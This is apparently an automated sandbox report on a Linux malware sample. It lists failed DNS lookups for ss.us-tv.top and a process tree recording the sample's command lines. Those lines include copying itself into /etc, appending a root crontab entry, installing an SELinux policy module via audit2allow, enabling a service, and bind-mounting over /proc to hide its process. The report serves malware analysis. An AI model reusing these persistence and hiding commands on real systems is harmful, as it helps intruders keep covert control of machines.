Nov 2, 2024 04:01:58.978538036 CET	8.8.8.8	192.168.2.14	0xc4a1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:00.114701986 CET	8.8.8.8	192.168.2.14	0x5289	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:00.324327946 CET	8.8.8.8	192.168.2.14	0x7189	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:01.460661888 CET	8.8.8.8	192.168.2.14	0x946b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:01.460872889 CET	8.8.8.8	192.168.2.14	0x5101	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:02.600512981 CET	8.8.8.8	192.168.2.14	0x4c3a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:02.600554943 CET	8.8.8.8	192.168.2.14	0x72d3	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:03.737323046 CET	8.8.8.8	192.168.2.14	0x6243	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:03.737440109 CET	8.8.8.8	192.168.2.14	0x5a22	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:04.872252941 CET	8.8.8.8	192.168.2.14	0x17f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:06.008400917 CET	8.8.8.8	192.168.2.14	0x72a2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:07.144063950 CET	8.8.8.8	192.168.2.14	0xf67	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:08.282931089 CET	8.8.8.8	192.168.2.14	0xea20	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:08.283871889 CET	8.8.8.8	192.168.2.14	0x2400	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:09.419079065 CET	8.8.8.8	192.168.2.14	0xba52	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:10.559438944 CET	8.8.8.8	192.168.2.14	0xf2b7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:10.559731960 CET	8.8.8.8	192.168.2.14	0x2b74	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:11.701862097 CET	8.8.8.8	192.168.2.14	0xc84c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:12.839504957 CET	8.8.8.8	192.168.2.14	0x3442	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:12.839601994 CET	8.8.8.8	192.168.2.14	0x8ea9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:13.977197886 CET	8.8.8.8	192.168.2.14	0x2fb3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:13.977217913 CET	8.8.8.8	192.168.2.14	0x42ac	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:15.113302946 CET	8.8.8.8	192.168.2.14	0x4d73	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:15.114090919 CET	8.8.8.8	192.168.2.14	0xa19e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:16.249855995 CET	8.8.8.8	192.168.2.14	0xdf9f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:17.392385006 CET	8.8.8.8	192.168.2.14	0x377b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:17.392802954 CET	8.8.8.8	192.168.2.14	0x80f8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:18.530814886 CET	8.8.8.8	192.168.2.14	0x32bd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:18.533071995 CET	8.8.8.8	192.168.2.14	0x1fdd	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:19.671215057 CET	8.8.8.8	192.168.2.14	0xb4bf	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:19.671509027 CET	8.8.8.8	192.168.2.14	0x6cc6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:20.807504892 CET	8.8.8.8	192.168.2.14	0x32f4	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:20.807670116 CET	8.8.8.8	192.168.2.14	0xed67	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:21.945935011 CET	8.8.8.8	192.168.2.14	0x4c59	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:21.945974112 CET	8.8.8.8	192.168.2.14	0x7652	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:23.084233999 CET	8.8.8.8	192.168.2.14	0x8f8d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:24.225100040 CET	8.8.8.8	192.168.2.14	0x9043	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:24.225245953 CET	8.8.8.8	192.168.2.14	0x311e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:25.526611090 CET	8.8.8.8	192.168.2.14	0xb49f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:26.663995981 CET	8.8.8.8	192.168.2.14	0x11a9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:26.664025068 CET	8.8.8.8	192.168.2.14	0x7624	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:27.801099062 CET	8.8.8.8	192.168.2.14	0x97cc	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:27.802040100 CET	8.8.8.8	192.168.2.14	0x3e3d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:29.423918009 CET	8.8.8.8	192.168.2.14	0x2689	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:29.423959970 CET	8.8.8.8	192.168.2.14	0x339	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:30.561338902 CET	8.8.8.8	192.168.2.14	0xc97c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:30.561356068 CET	8.8.8.8	192.168.2.14	0xd08	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:31.697402954 CET	8.8.8.8	192.168.2.14	0x7210	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:02:31.697480917 CET	8.8.8.8	192.168.2.14	0x2ad6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:33.226149082 CET	8.8.8.8	192.168.2.14	0x1af1	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false

System Behavior

Analysis Process: fL4E1jNVCt.elf PID: 5752, Parent PID: 5676

General

Start time (UTC):	03:00:26
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	/tmp/fL4E1jNVCt.elf
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5756, Parent PID: 5752

General

Start time (UTC):	03:00:26
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5756, Parent PID: 5752

General

Start time (UTC):	03:00:26
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	/tmp/fL4E1jNVCt.elf
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5765, Parent PID: 5756

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: bash PID: 5765, Parent PID: 5756

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c /etc/32676&
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5766, Parent PID: 5765

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5766, Parent PID: 2955

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	/etc/32676
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 5768, Parent PID: 5766

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 5768, Parent PID: 5766

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 5960, Parent PID: 5766

General

Start time (UTC):	03:01:28
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: opt.services.cfg PID: 5960, Parent PID: 5766

General

Start time (UTC):	03:01:28
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: opt.services.cfg PID: 5964, Parent PID: 5960

General

Start time (UTC):	03:01:28
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: opt.services.cfg PID: 5964, Parent PID: 5960

General

Start time (UTC):	03:01:28
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: 32676 PID: 5973, Parent PID: 5766

General

Start time (UTC):	03:01:29
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 5973, Parent PID: 5766

General

Start time (UTC):	03:01:29
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 6041, Parent PID: 5766

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: opt.services.cfg PID: 6041, Parent PID: 5766

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: opt.services.cfg PID: 6045, Parent PID: 6041

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: opt.services.cfg PID: 6045, Parent PID: 6041

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: 32676 PID: 6054, Parent PID: 5766

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 6054, Parent PID: 5766

General

Start time (UTC):	03:02:29
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5767, Parent PID: 5756

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: service PID: 5767, Parent PID: 5756

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service crond start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5769, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5769, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5770, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5770, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5771, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5771, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5772, Parent PID: 5767

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5773, Parent PID: 5772

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5773, Parent PID: 5772

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5774, Parent PID: 5772

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5774, Parent PID: 5772

General

Start time (UTC):	03:00:28
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5767, Parent PID: 5756

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5777, Parent PID: 5756

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: bash PID: 5777, Parent PID: 5756

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5778, Parent PID: 5777

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5778, Parent PID: 5777

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5782, Parent PID: 5777

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5782, Parent PID: 5777

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5786, Parent PID: 5777

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5786, Parent PID: 5777

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5806, Parent PID: 5777

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5806, Parent PID: 5777

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5822, Parent PID: 5756

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: bash PID: 5822, Parent PID: 5756

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5823, Parent PID: 5822

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5824, Parent PID: 5822

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5825, Parent PID: 5822

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5826, Parent PID: 5756

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: bash PID: 5826, Parent PID: 5756

General

Start time (UTC):	03:00:32
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5827, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: renice PID: 5827, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/bin/renice
Arguments:	renice -20 5756
File size:	14568 bytes
MD5 hash:	3686c936ed1df483498266a36871cb5b

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5828, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: mount PID: 5828, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5756
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5850, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: service PID: 5850, Parent PID: 5756

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5851, Parent PID: 5850

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5851, Parent PID: 5850

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5852, Parent PID: 5850

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5852, Parent PID: 5850

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5853, Parent PID: 5850

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5853, Parent PID: 5850

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5854, Parent PID: 5850

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5855, Parent PID: 5854

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5855, Parent PID: 5854

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5856, Parent PID: 5854

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5856, Parent PID: 5854

General

Start time (UTC):	03:00:34
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5850, Parent PID: 5756

General

Start time (UTC):	03:00:36
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: fL4E1jNVCt.elf PID: 5881, Parent PID: 5756

General

Start time (UTC):	03:00:36
Start date (UTC):	02/11/2024
Path:	/tmp/fL4E1jNVCt.elf
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: systemctl PID: 5881, Parent PID: 5756

General

Start time (UTC):	03:00:36
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5780, Parent PID: 5779

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5780, Parent PID: 5779

General

Start time (UTC):	03:00:30
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5784, Parent PID: 5783

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5784, Parent PID: 5783

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5787, Parent PID: 1

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
